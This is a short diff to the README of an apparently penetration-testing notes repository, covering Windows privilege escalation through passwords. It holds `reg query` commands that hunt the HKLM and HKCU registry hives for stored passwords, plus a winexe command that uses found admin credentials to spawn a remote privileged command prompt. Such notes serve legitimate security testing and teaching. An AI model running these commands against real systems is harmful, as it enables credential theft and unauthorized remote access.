seeu-inspace/easyg/README.md

 #### <ins>Passwords</ins>

 **Registry**
-1. Search for keys and values that contain the word "password": `reg query HKLM /f password /t REG_SZ /s`
+1. Search for keys and values that contain the word "password"
+   - `reg query HKLM /f password /t REG_SZ /s`
+   - `reg query HKCU /f password /t REG_SZ /s`
 2. If you have found an admin and its password, use [winexe](https://www.kali.org/tools/winexe/) command from the attacker machine to spawn a command prompt running with the admin privileges `winexe -U 'admin%password' //<IP> cmd.exe`

 **Saved Credentials**